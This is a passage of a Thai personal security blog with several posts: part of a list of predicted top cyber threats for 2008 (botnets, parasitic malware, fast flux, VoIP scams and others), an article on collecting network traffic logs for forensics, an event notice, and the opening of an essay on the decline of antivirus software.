นั้นเอง ในปี 2008 กองทัพ Botnet ที่พร้อมใช้งานจะมีอัตราที่สูงขึ้น และอาจมีการซื้อขาย กองทัพ Botnet ในกลุ่มอาชญกรคอมพิวเตอร์ เพื่อใช้โจมตีเครือข่ายเครือข่ายขนาดใหญ่ ได้ต่อไป

ภัยคุกคามอันดับที่ 2 : Parasitics Malware เป็นไวรัสที่แก้ไขไฟล์ที่อยู่ในดิสก์ และใส่โค้ดเข้าไปในไฟล์ ในปีที่ผ่านมาจะพบว่าผู้เขียนไวรัสจะใช้วิธีนี้สร้างไวรัสชนิดต่างๆ ตัวอย่างเช่น Grum , Virut และ Almanahe คาดว่าจะมี Parasitics Malware เติบโตขึ้นในปี 2008 และการฝั่งโค้ดเข้าไปในไฟล์ จากเดิมเน้นการทำลายเครื่องให้เกิดความผิดปกติ ก็จะทำฝั่งตัวควบคุมเครื่อง อาจเป็น Backdoor , Trojan , หรือ Script บางอย่างที่ทำให้เครื่องติด Parasitic Malware ตกเป็นทาส (Zombie) ได้ซึ่งการเกิด Zombie หลายๆเครื่อง ก็จะกลายเป็นกองทัพ Botnet ที่พร้อมใช้งานในการโจมตีต่อไป

สัดส่วนการเจริญเติบโตจากภัยคุกคามชนิด Parasitics Malware จาก Mcafee

ภัยคุกคามอันดับที่ 3 : การยึดระบบเสมือนจริง (Virtualization) ผู้ สร้าง Malware พยายามค้นหาช่องโฆว่ในระบบ Virtualization มากขึ้นการที่ได้ควบคุมระบบปฏิบัติการเสมือน ในการสร้างกองทัพ Botnet และเพื่อการแพร่กระจายการติดเชื้อแบบ Storm worm ขึ้น ทั้งนี้เพื่อสร้างจำนวน Zombie แบบไร้ตัวตนให้มากขึ้น Virtualization เป็นเทคโนโลยีที่ช่วยให้สามารถแบ่งพาทิชันคอมพิวเตอร์ให้สามารถรันซอฟต์แวร์ และแอพพลิเคชันในจำนวนมากๆ หรือแม้แต่รันระบบปฏิบัติการได้หลายๆ ตัวพร้อมกันซึ่งพื้นที่ที่แบ่งพาทิชันขึ้นนั้นมักรู้จักกันว่า “Virtual Space” หรือ “Container” โดยปัจจุบัน Virtual lization Technology มีการใช้งานกันมากขึ้น

ช่องโหว่ที่ค้นพบบนระบบเสมือน

ภัยคุกคามอันดับที่ 4 FastFlux เป็นเทคนิคทาง DNS ที่ใช้โดย Botnet เพื่อซ่อนเว็บไซต์ที่ทำหน้าที่ให้บริการ Phisihing และมัลแวร์ ที่อยู่เบื้องหลังเครือข่ายของโฮสต์ที่ถูกบุกรุกทำตัวเป็น Proxy ที่มีการเปลี่ยนแปลงตลอดเวลา รวมถึงเครือข่ายแบบ Peer-to-Peer รวมกันหลายเครือข่าย ใช้เทคนิคต่างๆ ได้แก่ การใช้คำสั่งและการควบคุมแบบกระจาย (Distributed) การใช้ Load Balancing และการเปลี่ยนเส้นทาง proxy เพื่อทำให้การเครือข่ายมัลแวร์ยากต่อการถูกตรวจพบและการป้องกัน Storm Worm เป็นหนึ่งในมัลแวร์ที่ใช้เทคนิคเหล่านี้ผู้ใช้อินเทอร์เน็ตอาจพบการใช้ fast flux ในการโจมตี phishing ที่มีเชื่อมโยงกับกลุ่มอาชญากร รวมถึงการโจมตี MySpace ด้วยในปี 2008 นี้

ในปี 2008 อาจมีอาชีพใหม่ ในการค้าขาย กองทัพ botnet ในตลาดอินเตอร์เน็ทก็เป็นได้ ทั้งนี้กองทัพ botnet อาจจะมีมากในประเทศที่พึ่งมีการเชื่อมต่ออินเตอร์เน็ท และระบบเครือข่ายใหม่ๆ ที่ยังขาดการป้องกันภัยที่ดี อีกทั้งจะมีจำนวนมากขึ้นสำหรับประเทศที่ยังไม่มีกฎหมายเอาผิดกับผู้ใช้ botnet ซึ่งผลที่เกิดจากการโจมตีของ Botnet ไม่ใช่แค่เพียงการส่ง Spam , DDoS/DoS , Virus/worm อีกต่อไป แต่เป็นภัยคุกคามอื่น ที่คาดไม่ถึงว่าจะเกิดขึ้นก็เป็นไปได้

จำนวน botnet ในแต่ละวัน

กลุ่มที่ 2 ภัยคุกคามจากช่องโหวที่พบบนระบบปฏิบัติการ ่

ภัยคุกคามอันดับ 5 : Operating System Vulnerability : ระบบปฏิบัติการที่เรารู้จักกันดี ไม่ว่าเป็น Linux / BSD , MaC OS หรือ Windows Microsoft นำไปใช้บน Appliance ต่างๆ รวมไปถึงระบบมือถือ ที่ในปีหน้า 2008 นี้เองจะเห็นว่าคนทั่วไปพกมือถือที่มีมัลติมีเดีย และสามารถท่องโลกอินเตอร์เน็ทได้ สามารถทำอะไรๆ ที่ต้องการได้ ทำงานแทน Notebook ได้ ไม่ว่าเป็นมือถือที่ระบบปฏิบัติการของ Mac ที่ชื่อว่า iPhone หรือพวก Windows Mobile ซึ่งในปีหน้าอาจพบช่องโหว่ต่างๆ ที่เกิดขึ้นบนเครื่องมือถือมากขึ้น ไม่ว่าเป็นพวก Virus/worm, Spam เหล่านี้สร้างความเสียหายไม่น้อยกว่าเครื่อง PC ที่ใช้กันทั่วไป ที่เป็นเช่นนี้ก็เนื่องจาก Application ที่มากขึ้น บนตัวระบบ Operating System ทำให้ภาพรวมการใช้งาน จะพบช่องโหว่มาขึ้นจาก Application มากกว่า OS ก็ตาม หลายคนยังตั้งข้อสังเกตถึงระบบปฏิบัติการใหม่ของ Windows Microsoft ที่ชื่อว่า Vista ที่ยังมีช่องโหว่และไม่ได้รับการแก้ไขให้ทันเวลา ซึ่งจะขยายผลต่อให้เกิดภัยคุกคามใหม่ที่ฝั่งเข้าสู่ระบบ และสร้างเป็น Zombie ต่อไปได้เช่นกัน

กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท

กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท ซึ่งส่วนตัวผมถือว่าเป็นกลุ่มภัยคุกคามประจำปี 2008 เนื่องจากการเจริญเติบโตการใช้งานอินเตอร์เน็ทที่มากขึ้นและความซับซ้อนของ รูปแบบการใช้งาน มีผลให้เกิดอาชญกรรมเกี่ยวกับการขโมยข้อมูลส่วนตัว การนำข้อมูลส่วนตัวมาเผยแพร่ โดยไม่ได้รับอนุญาติ และการหลอกหลวงทางเทคโนโลยีต่างๆ ที่เกี่ยวข้องกับการใช้งาานอินเตอร์เน็ท ส่วนบุคคลมากขึ้นนั่นเอง สรุปว่ากลุ่มนี้ เหยื่อมักเกิดจาก ความรู้เท่าไม่ถึงการณ์ การทำนายภัยคุกคามที่อาจเกิดขึ้นในปี 2008 ในกลุ่มที่ 3 นี้ก็เพื่อป้องกันไม่สิ่งเหล่านี้เกิดกับตนเอง และคนใกล้ตัวให้พึ่งระวังได้

ภัยคุกคามอันดับที่ 6 : ซอฟต์แวร์ไม่พึ่งประสงค์จากการใช้สนทนาออนไลท์ (Instant Malware) เป็นการใช้งานที่ประมาทของผู้ใช้เอง ที่อาจจะดาวโหลดซอฟต์แวร์จาก คู่สนทนาที่ไม่รู้จัก หรือรู้จัก มีไฟล์แนบมา หรือที่พบมากขึ้นคือ ในรูปแบบของ Flash ที่สามารถเอ็กซิคิวท์ตัวเองได้ มาพร้อมกับโปรแกรมประเภท Instant Messaging

ช่องโหว่ที่ค้นพบจากการใช้งาน IM ในแต่ละปี

ภัยคุกคามอันดับที่ 7 : บริการเกมส์ออนไลน์ (Online Gaming) ผู้ใช้บริการอาจตกเป็นเหยื่อ เนื่องจากของในเกมส์สามารถซื้อขายกันเงินจริงๆได้ ตัวอย่างเห็นได้จากโทรจันที่ขโมยรหัสผ่านของบริการเกมส์ออนไลน์ ในปี 2007 จะมีอัตราเติบโตเร็วกว่าจำนวนของโทรจันที่มีเป้าหมายกับผู้ใช้บริการของ ธนาคาร

Powered by Gregarious (42)

ภัยคุกคามอันดับที่ 8 : สังคมออนไลท์แบบเปิด (Social Networking) กับการใช้ข้อมูลบน Web 2.0 เป็นที่รู้กันว่าสังคมแบบเปิดบนโลกอินเตอร์เน็ทมีจำนวนมากขึ้นจากเทคโนโลยี Web 2.0 สิ่งที่ตามมา ผมเคยทำนายไว้ในบท 7 ภัยคุกคามปี 2007 ไปแล้วว่าการควบคุม Social Networking เป็นเรื่องยาก เพื่อเนื้อหาเกิดจากผู้ใช้งานทุกคน ทุกคนมีส่วนร่วมในการสร้างเนื้อบนเว็บไซด์ การควบคุมเรื่องนี้เป็นเรื่องยาก เรามักได้ยินข่าวการโพสเรื่องราวการหมิ่นประมาทสิทธิส่วนบุคคล การกล่าวร้าย การกล่าวเท็จ ปิดเบือนข้อเท็จจริง บน Web 2.0 รวมถึงพวก Web Board อยู่ตลอดทั้งปี ไม่ว่าเป็น Youtube , Camfroge , Myspace.com เป็นต้น หรือแม้เว็บไทยของเราก็มีจำนวนไม่น้อยที่เกิดเรื่องเหล่านี้ การควบคุมทัศนะคติแต่บุคคลที่เข้ามา Post เนื้อหาในเว็บเป็นเรื่องที่ควบคุมลำบาก แต่เป็นเรื่องไม่ยากในการทราบที่มาที่ไปของการ Post สิ่งเหล่านี้ จึงทำให้มีการหลอกหลวงจากความรู้เท่าไม่ถึงการณ์จากการใช้งาน Web 2.0 มากขึ้น และผลการคาดการแล้วพบว่าอาจเกิดมีผู้โจมตีจะใช้เวบไซต์ที่ใช้เทคโนโลยี Web 2.0 เพื่อแพร่กระจายมัลแวร์และรวบรวมข้อมูลต่าง ๆ ที่ต้องการจากเว็บเพื่อค้นหาข้อมูลที่ผู้ใช้แชร์ไว้เพื่อทำให้การโจมตีดู เหมือนจริงมากยิ่งขึ้น

ภัยคุกคามอันดับที่ 9 การหลอกลวงจากการใช้เทคโนโลยี VoIP : ในปีคศ.2007 จำนวนของช่องโหว่ที่รายงานเกี่ยวกับ VoIP มากกว่ารายงานช่องโหว่ในปีคศ.2006 ถึงสองเท่า นอกจากนี้ยังมีรายงานเกี่ยวกับการโจมตีที่เรียกว่า vishing และ phreaking ซึ่งอาจเกิด Spam บน VoIP และการหลอกลวงจาก Botnet ที่เป็นเสียงมากับมือถือโดยใช้เทคนิค (Social Engineering) ได้เช่นกัน

VoIP-Voice Over IP หรือที่เรียกกันว่า “VoIP Gateway” หมายถึง การส่งเสียงบนเครือข่ายไอพี เป็นระบบที่แปลงสัญญาณเสียงในรูปของสัญญาณไฟฟ้ามาเปลี่ยนเป็นสัญญาณดิจิตอล คือ นำข้อมูลเสียงมาบีบอัดและบรรจุลงเป็นแพ็กเก็ต ไอพี (IP) แล้วส่งไปโดยมีเราเตอร์ (Router) ที่เป็นตัวรับสัญญาณแพ็กเก็ต และแก้ปัญหาบางอย่างให้ เช่น การบีบอัดสัญญาณเสียงให้มีขนาดเล็กลง การแก้ปัญหาเมื่อมีบางแพ็กเก็ตสูญหาย หรือได้มาล่าช้า (delay)การสื่อสารผ่านทางเครือข่ายไอพีต้องมีเราเตอร์ (Router) ที่ทำหน้าที่พิเศษเพื่อประกันคุณภาพช่องสัญญาณไอพีนี้ เพื่อให้ข้อมูลไปถึง ปลายทางหรือกลับมาได้อย่างถูกต้องและอาจมีการให้สิทธิพิเศษก่อนแพ็กเก็ตไอพี อื่น (Quality of Service : QoS) เพื่อการให้บริการที่ทำให้เสียงมีคุณภาพ

นอกจากนั้น Voice over IP (VoIP) ยังเป็นการส่งข้อมูลเสียงแบบ 2 ทางบนระบบเครือข่ายแบบ packet-switched IP network. ซึ่งข้อมูลนี้จะถูกส่งผ่านเครือข่ายอินเตอร์เน็ตสาธารณะเพื่อสื่อสารระหว่าง VoIP ด้วยกัน โดยที่ยังคงความเป็นส่วนตัวไว้ได้

เทคโนโลยีนี้ยังใหม่และยังขาดวิธีที่ใช้ในการป้องกัน คาดว่าจะมีการโจมตี VoIP เพิ่มขึ้นร้อลละ 50 ในปีคศ.2008 หรือแม้แต่กระทั่งมัลแวร์ (Malware) ที่โจมตี VoIP แพร่กระจายสู่วงกว้าง

ภัยคุกคามอันดับ 10 :การติดกับดักทางข้อมูล (Information pitfall) เรื่องนี้ผมถือว่าเป็นเรื่องใหญ่ และเคยเขียนบทความเรื่องนี้ในเดือนเมษายน ปี 2007 ที่บอกว่าเป็นเรื่องใหญ่เพราะว่าเป็นการสร้างความเชื่อให้เกิดขึ้นกับบุคคล การสร้างกลยุทธการตลาดเข้ามาเพื่อสร้างภาพ สร้างความเชื่อ หากเป็นความเชื่อที่เป็นสิ่งที่ถูกต้อง และมีคุณธรรม ก็ดีไป แต่หากเป็นการสร้างความเชื่อ เพื่อหลอกหลวง ก็จะทำให้เกิดความเสียหายได้เช่นกัน ตัวอย่างเราจะพบว่า Scam Web , Phishing Web , Adsware ที่ติดมากับ Web ถึงแม้จะจำนวนน้อยลงเพราะคนเริ่มตะหนักถึงภัยคุกคามที่ตามจากเข้าเว็บพวกนี้ แต่ก็ยังมีจำนวนคนไม่น้อยที่ยังตกเป็นเหยื่ออยู่ตลอดทั้งปี สิ่งนี้จะจางหายไปกับกับระบบป้องกันภัยทั้งด้านระบบป้องกันภัยทางเครือข่าย (Network) และระบบป้องกันภัยระดับเครื่องคอมพิวเตอร์ (Host) ที่มีความทันสมัยและฉลาดในวิธีการป้องกันก็ตาม การสร้างค่านิยม บนความเชื่อ ถือว่ามีความเกี่ยวพันกับความมั่นคงของชาติในอนาคต มันอาจเป็นเรื่องพูดได้ยากในขณะนี้ เพราะทุกคน ยินดีต้อนรับเทคโนโลยีที่มาจากต่างประเทศ โดยไม่คิดว่าผลสืบเนื่องในอนาคต ซึ่งอาจนำมาถึงการตกเป็นอนานิคมทางเทคโนโลยี (Information Technology Colonization) โดยยินยอมพร้อมใจก็ได้

ความเชื่อ จากค่านิยม ที่คิดว่าต่างประเทศดีกว่าเรา เป็นเรื่องยากที่แก้ไข แต่ไม่สายที่ดำเนินการ ถึงเวลาที่เราทุกคนต้องสร้างความเชื่อมั่นว่า คนไทยไม่แพ้ไคร ไม่ได้ด้อยไปกว่าใครในโลกนี้

สวัสดีปีใหม่ครับ

นนทวรรธนะ สาระมาน
Nontawattana Saraman

Network Time Machine ตอนที่ 1


… หากเราสามารถย้อนเวลาได้ เราจะทำอะไร? แน่นอนเราคงทำในสิ่งที่เราตัดสินใจผิดพลาดมาในอดีต แต่ในความเป็นจริงเราไม่สามารถย้อนเวลาได้ นอกจากจะยอมรับในการตัดสินใจของเราเอง …

ในสมัยก่อนย้อนเวลาไป ในปี 1985 หรือ ปี พศ. 2528 เคยมีหนังเรื่องหนึ่งที่ผมชอบมาก คือ Back To The Future ภาค 1 นำแสดงโดย Michael J. Fox ตัวพระเอกในเรื่องเองสามารถย้อนเวลากลับไปได้ โดยใช้รถยนต์ ที่เรียกว่า เป็น Time Machine เป็นหนังตลก และสนุก มีสีสัน รวมถึงมีฉากที่สวยๆ น่ารัก สมควรแก่การสะสม

การสืบค้นร่องรอยเพื่อพิสูจน์หลักฐานทางข้อมูลสารสนเทศ นี้ ศัพ์ทางภาษาอังกฤษเรียกว่า Chain of Custody หรือ Chain of Evidence ที่มีความสอดคล้องกับสิ่งที่ต้องการรู้ เพื่อรับทราบถึงเหตุปัจจัย Network Time Machine คือศัพท์ที่เกี่ยวข้องกับวิธีการย้อนเวลาเพื่อสืบหาต้นเหตุของหลักฐาน โดยใช้เทคโนโลยีบนระบบเครือข่าย ผมจึงระบุศัพท์คำนี้ขึ้น โดยไม่ได้สนใจพจนานุกรมทางคอมพิวเตอร์ อีกแล้ว ..

ในโลกระบบเครือข่ายคอมพิวเตอร์แล้ว เมื่อเกิดเหตุการณ์ไม่คาดฝันขึ้น และเราต้องการทราบถึงที่มาที่ไป หรือที่เรียกว่า กระแสของเหตุปัจจัย หรือ อิทัปปัจจยตา สิ่งใดมีเพราะมีเหตุปัจจัยให้มี ส่ิงใดไม่มีเพราะไม่มีเหตุปัจจัยให้มี ไม่มีอะไรมีหรือไม่มีโดยตัวของมันเอง “สิ่งนี้เกิดสิ่งนี้จึงเกิด สิ่งนั้นไม่เกิดสิ่งนั้นจึงไม่เกิด”
เรามักจะนึกถึงการเก็บบันทึกข้อมูลจราจร หรือภาษาอังกฤษที่เรียกว่า Log จาก Data Traffic เราถึงจะวิเคราะห์ย้อนหลังไปได้ ว่ามีเหตุการณ์อะไรเกิดขึ้น ซึ่งเป็นที่มาของศาสตร์ที่เรียกว่า Network/Computer Forensics นั้นเอง แน่นอนการเก็บบันทึกเหตุการณ์เหล่านั้นเป็นไปตามเนื้อผ้า เก็บอย่างที่เห็นว่าควรจะเป็น หากไม่มีการแก้ไขข้อมูลจากผู้ไม่หวังดี เสียก่อน
บทความนี้ส่วนหนึ่ง ผมเขียนขึ้นเพื่อสร้างความเข้าใจถึงกรรมวิธีการเก็บข้อมูลจราจร (Data Traffic) อย่างน้อยคงได้ประโยชน์สำหรับการนำไปใช้ประยุกต์กับ การเก็บข้อมูลตาม พรบ. ว่าด้วยการกระทำผิดทางคอมพิวเตอร์ ที่ประกาศใช้ เมื่อไม่นานนี้
กรรมวิธีในการเก็บข้อมูลจราจร มีด้วยกัน 3 วิธี แบ่งได้ดังนี้
1. ข้อมูลที่เกิดขึ้นบนระดับเครื่อง (Local Host Log) ไม่ว่่าจะเป็นระดับเครื่องลูกข่าย (Client) หรือ เครื่องแม่ข่าย (Server) การเก็บในหัวข้อนี้เป็นเรื่องละเอียดอ่อน และมีคุณค่าในการทำ Computer Forensics หรือที่เรียกว่า การสืบหาหลักฐานทางคอมพิวเตอร์ เรามักจะเก็บ Log จาก System , Application และ User เป็นหลัก ในแต่ละเครื่องย่อมมี Application ที่แตกต่างกัน ส่วน User แล้วจะมีประโยชน์มากสำหรับเครื่องที่เป็นแม่ข่าย (server) การเก็บบันทึกข้อมูลจราจรขึ้นอยู่กับระบบปฏิบัติการ และมีซอฟต์แวร์ทุ่นแรงมาแล้วจากระบบปฏิบัติการ โดยเฉพาะระบบปฏิบัติการ Windows ซึ่งมี GUI ที่ดูแล้วสะดวกในการใช้งาน ทั้งหมดนี้ขึ้นตรงกับเวลา (Time) ที่เป็นตัวกำหนดชะตาบนเครื่องนั่นๆ ไม่ว่าเป็น
System มีความผิดปกติ จากอะไร ช่วงเวลาใด
Application ใดที่ใช้งาน บนเครื่องคอมพิวเตอร์ของเรา ก็ได้แก่ Web Browser Application ที่ใช้ก็ได้แก่ Firefox หรือ IE , Chat , Mail Client POP3 ไม่ว่าเป็น Outlook , Thunderbird เป็นต้น เราต้องพิจารณาการเก็บบันทึกเหตุการณ์ตาม ช่วงเวลาที่ใช้ Application ต่างๆ ที่กล่าวมา รวมถึงการติดต่อสื่อสารบน Application จากเครื่อง สู่ ระบบเครือข่าย (Network) ซึ่งอาจต้องกล่าวในขั้นตอนต่อไป เป็นความสัมพันธ์ ชนิด 3 in 3 out หากต้องพิสูจน์หาหลักฐาน ต้องพิจารณาการเชื่อมโยงเครือข่าย จะเข้าสู่แนวทางการปฏิบัติแบบ Network Forensics จากความสัมพันธ์ส่วนนี้เอง

2. การบันทึกข้อมูลจราจรระดับเครือข่ายคอมพิวเตอร์ (Network Data Traffic) การเก็บบันทึกเหตุการณ์ส่วนนี้ มักดูจากอุปกรณ์เครือข่าย ไม่ว่าเป็นการอุปกรณ์ที่ใช้สำหรับวิเคราะห์ปัญหาเครือข่าย และอุปกรณ์ดักจับข้อมูลต่างๆ ได้แก่ อุปกรณ์ Sniffer หรือ IDS (Intrusion Detection System) ที่ปรับแต่งการตรวจจับให้รองรับข้อมูลจราจรบางสิ่งบางอย่าง อย่างจงใจ จากผู้ดูแลระบบ ซึ่งในส่วนนี้เป็นที่มาการสร้างระบบเฝ้าระวังภัยคุกคามทางความมั่นคงข้อมูลอย่าง SRAN (Security Revolution Analysis Network) ขึ้น ซึ่งการบันทึกข้อมูลจราจรจากระดับเครือข่าย นี้ไม่ละเอียดเหมือนกรรมวิธีที่หนึ่ง แต่จะเห็นภาพรวมเหตุการณ์ ที่มีการติดต่อสื่อสารกันได้แบบเชิงกว้าง ไม่ลึก แต่พอทราบถึงเหตุปัจจัยการเกิดเหตุ นั่นเอง ซึ่งวิธีการนี้ สามารถตรวจจับตาม Protocol Application ที่ใช้งานทั้งในเครือข่าย (LAN Technology) สู่ภายนอกเครือข่าย (WAN Technology) ได้ Protocol ที่สนใจก็ได้แก่
Routing Protocol เส้นทางการลำเลียงข้อมูล ผ่านจากตัวเครื่องคอมพิวเตอร์ ในระดับ Host ไปสู่ระดับเครือข่าย (Network) และ ระหว่างเครือข่ายกับเครือข่าย (Network to Network) ช่วงเวลาที่เกิดการลำเลียงข้อมูล ระหว่าง IP ต้นทาง (Source IP) และ IP ปลายทาง (Destination) , Time Date
ส่วน Application Protocol ใกล้เคียงกับ วิธีที่ 1 แต่แทนที่อยู่ในระดับเครื่องก็จะมองถึง ข้อมูลวิ่งผ่านเข้าออก บนระบบเครือข่ายแทน เช่น Web (HTTP) , Mail (SMTP, POP3 , IMAP) , IM (Chat) , P2P , FTP , Telnet เป็นต้น ช่วงเวลาที่บันทึก (Time Date) ส่วน Protocol ที่มีการเข้ารหัสไว้ เช่น SSL , SSH สามารถรู้ได้เฉพาะ IP ต้นทาง และ IP ปลายทางในการเชื่อมต่อ แต่ระหว่างเนื้อหาในการกระทำไม่สามารถรู้ได้ทั้งหมด ยกเว้นจะใช้เทคนิคพิเศษ ซึ่งทำตัวคล้ายๆ กับ Man in the Middle เป็นต้น ในที่นี้ผมไม่ขอกล่าวถึงการตรวจจับชนิดการเข้ารหัสผ่าน Application Protocol ดังกล่าว ซึ่งทั้งนี้เราก็สามารถรู้ถึงข้อมูล (Information) ที่วิ่งเข้าและออกบนเครือข่ายคอมพิวเตอร์ ได้ระดับหนึ่ง
ลักษณะการเก็บ เช่น Web บันทึก IP ที่ใช้งาน Web ปลายทาง และบันทึกตามเวลา , Mail IP ต้นทางที่ส่ง mail , ปลายทางรับ mail , หัวข้อ mail และ วันเวลาที่ใช้ Application นี้ เป็นต้น

3. การเก็บบันทึกข้อมูลจราจรทั้งหมด โดยเชื่อมต่อกับการเก็บบันทึกกลาง หรือที่เรียกว่าการทำ SIM (Security Information Management) คือ เก็บบันทึก Log จากหัวข้อที่ 1 ทั้งหมด ส่งเข้าสู่ศูนย์กลาง และหัวข้อที่ 2 แต่เปลี่ยนเป็นเก็บบันทึกตามอุปกรณ์เครือข่าย เช่น Router , Firewall , IDS/IPS , UTM (Unified Threat Management) เป็นต้น
ส่วนการเก็บบันทึกการใช้งานระดับ User เรามักมองหาเทคโนโลยี เช่น Radius คือระดับ WAN Technology ส่งออกไป และในระดับ LAN Technology ก็เป็นระบบ NAC (Network Access Control) เป็นต้น ซึ่งทั้งหมดนี้สามารถ ส่ง Log ที่เกิดขึ้นให้กับ SIM ได้ และ SIM จะใช้กลไกในการทำ Correlation Log การเปรียบเทียบความสัมพันธ์ของ Log แต่ละชนิดให้จัดระเบียบ รวบรวมตามหมวดหมู่สำหรับผู้ดูแลระบบต่อไป วิธีนี้เป็นวิธีที่ละเอียดที่สุด แต่ ในความเป็นจริงแล้วทำยากที่สุดเช่นกัน เพราะต้องอาศัย ผู้เชี่ยวชาญ ที่รู้จักชนิดการส่ง Log ในแต่ละอุปกรณ์ Application และความแตกต่างของรุ่น ยี่ห้อ ทั้งระดับ Host และ Devices อย่างชำนาญ ถึงจะส่ง Syslog มาที่ SIM บริหารจัดการได้ ในส่วนตัวผมแล้วคิดว่าระบบนี้ คงเป็นไปได้ยากในเมืองไทย เนื่องจากความมากด้วยบริษัท SI ที่ขาดความรู้ในเชิง Implement จริง ทำให้ผลกระทบว่าซื้อไปแล้ว อาจไม่คุ้มค่า ได้
ซึ่งทั้งหมดนี้จะเป็นการเก็บบันทึกข้อมูลจราจร ที่เกิดขึ้นจากการใช้งานคอมพิวเตอร์ ที่เรียกว่า “์Network Recorder” ซึ่งแน่นอนครับ ทั้งหมดนี้เวลาเป็นสิ่งสำคัญ Time Server จึงต้องเป็นเวลาที่เที่ยงตรงด้วยไม่เช่นนั้น เราจะทำการย้อนหลังเวลาที่บันทึกเหตุการณ์ โดยนั่ง Time Machine ทางเทคโนโลยี เพื่อสืบหาข้อมูลต่อไปไม่ได้

เมื่อทราบถึงการเก็บบันทึกข้อมูลจราจรแล้ว ต่อไป เราจะมาทราบถึงการย้อนเวลาเพื่อสืบค้นหา เหตุของปัจจั้ย สาเหตุต่างๆ ที่ค้นพบได้ ผ่านระบบเครือข่าย โดยการทำ Network Time Machine กันต่อไป
SRAN ที่คิดไว้ สามารถสร้างเป็น Network Time Machine จะบรรจบกันในโลกไซเบอร์ บนเวลาปัจจุบันที่เป็นจริงได้ ในตอนหน้าจะยกตัวอย่างให้เห็นภาพ

โปรดติดต่อตอนต่อไป ข้อแม้ว่่า จะมีตอนต่อไป ตามอารมณ์ผู้เขียน : )

นนทวรรธนะ สาระมาน
Nontawattana Saraman
27/10/50

บรรยายงานเปิดตัว CAT Cyfence

 CAT Telecom จัดงานเปิดตัวบริการใหม่ล่าสุด ‘Cyfence’ บริการการรักษาความปลอดภัยระบบเครือข่ายเทคโนโลยีสารสนเทศ ในวันอังคารที่ 24 ตุลาคม 2549 เวลา 10.00 น. ณ ห้องบางกอก คอนเวนชั่นเซ็นเตอร์ ชั้น 5 เซ็นทรัล พลาซ่า ลาดพร้าว

ในงานนี้ทางบริษัท Global Technology Integrated ผู้ผลิตเทคโนโลยี SRAN ได้ร่วมบรรยายหัวข้อ Sufficient Network Security บรรยายโดย นายนนทวรรธนะ สาระมาน ผู้จัดการฝ่ายผลิตภัณฑ์บริษัท Global Technology Integrated ในการบรรยายครั้งนี้มีเพื่อสร้างความตระหนักในการ ประยุกต์เทคโนโลยีด้านความปลอดภัยข้อมูลสารสนเทศ นำมาใช้ให้เกิดความคุ้มค่าแก่การลงทุน บนความพอเพียงและเรียบง่าย ซึ่งเป็นแนวคิดที่ทางบริษัทได้มีเจตนาจะเผยแพร่ให้กับทางสาธารณะชนให้เกิดประโยชน์กับสังคมไทยต่อไป
ตัวอย่างการบันทึกการบรรยายคลิกเพื่อดู video ที่รูป
Comments are closed.

จุดจบซอฟต์แวร์ Anti Virus ตอนที่ 1

หลายคนมักสนใจกับคำว่า “จุดจบ” เพราะจุดจบอาจจะเหลือเพียงประวัติศาสตร์ สำหรับผมแล้วที่ตั้งหัวข้อนี้ว่า จุดจบซอฟต์แวร์แอนตี้ไวรัส เป็นเพียงมุมมองและความคิดของผมเองนะครับ ท่านผู้อ่านลองคิด วิเคราะห์ตามว่าเห็นด้วยอย่างที่ผมคิดหรือเปล่า

ในอดีตที่ผ่าน เรามีอดีตกับ เทคโนโลยีสำหรับงานสื่อสาร ที่ถือได้ว่าเลิกใช้งานไปแล้ว หรือที่เรียกได้ว่าเกิดจุดจบของระบบไปเสียแล้ว หากลองลำดับดูหน่อยดีไหมครับว่ามีอะไรบ้าง เท่าที่ผมจะคิดได้ก็มีดังนี้

– ระบบโทรเลข กลายเป็นประวัติศาสตร์ไปเสียแล้วปัจจุบันก็ไม่มีใครใช้บริการโทรเลขแล้ว
– ระบบเพจเจอร์ ปัจจุบันก็เหลือน้อยจนเรียกได้ว่า ไม่มีผู้ใช้งานระบบนี้ไปแล้วเช่นกัน
– เทคโนโลยีบรรจุข้อมูล เช่นเดียวกันกับเรื่องของตลับเทปเพลง ที่สมัยนี้ฟังจาก MP3 ที่จุเพลงได้จำนวนมากแทน รวมถึงเทปวีดิโอ และ Disked ที่ใส่ข้อมูลในเครื่องคอมพิวเตอร์ ก็แทบจะไม่มีแล้ว Notebook สมัยใหม่ก็ไม่มีช่องเสียบแผ่น Disked ไปเสียแล้ว ยุคสมัยทำให้เปลี่ยนไปเป็นพัฒนากลายเป็น แผ่น CD ตามมาด้วยการจุข้อมูลที่เรียกว่า Personal External Hard disk ที่จุข้อมูลได้เยอะกว่า และสะดวกในการใช้งานแทนที่ของเดิมที่เคยใช้กัน

และอีกบางส่วนที่กำลังจะเกิดจุดจบได้ในประเทศไทย เราอีกระบบคือ ตู้โทรศัพท์หยอดเหรียฐ สมัยนี้เกือบทุกคนก็ติดต่อผ่านมือถือ คงเหลือไว้เพียงตู้โทรศัพท์สำหรับเหตุฉุกเฉินเมื่อแบตเตอรี่มือถือหมด หรือเหตุใดๆ ที่ต้องการซ่อนเบอร์เพื่อติดต่อหาผู้อื่น
ระบบการส่งข้อมูลแบบ Token Ring ที่ในปัจจุบันระบบนี้ไม่สะดวกกับการใช้งานนัก และการรับส่งข้อมูลก็อยู่ในอัตตราที่ล้าสมัยไม่รวดเร็วเหมือนเทคโนโลยีใหม่ , ระบบการทำงานบนเครื่อง MainFrame เนื่องจากราคาสูง และการใช้งานเฉพาะทาง ที่ปัจจุบันหาระบบมาใช้ทดแทนกันได้ โดยราคาประหยัดลง เทคโนโลยีนี้จึงค่อยหายไปในโลกปัจจุบันไป , ระบบการส่งข้อมูลที่ใช้และระบบการทำงานที่ยังต้องยึดติด Application software จากระบบปฏิบัติการโบราณ ได้แก่ ระบบ DOS , Windows 3.11 , Windows 95 เป็นต้น

โลกสมัยปัจจุบัน ดังนี้
แนวคิดที่อยู่ได้คือ แนวคิดแบบ Open Source
เว็บไซด์ www สมัยใหม่เกิดจากแนวคิดแบบ Open Source จึงทำให้เกิด community (ชุมชน online) และทำให้เกิด Web 2.0 ตามมา เป็นไปตามเหตุปัจจัย หรือ อิทัปปัจจยตา นั้นเอง
เช่นเดียว google แนวคิดแบบทฤษฎึเกมส์ (Game Theory) ทำให้เกิด แนวคิด google Summer of Code เป็นต้น

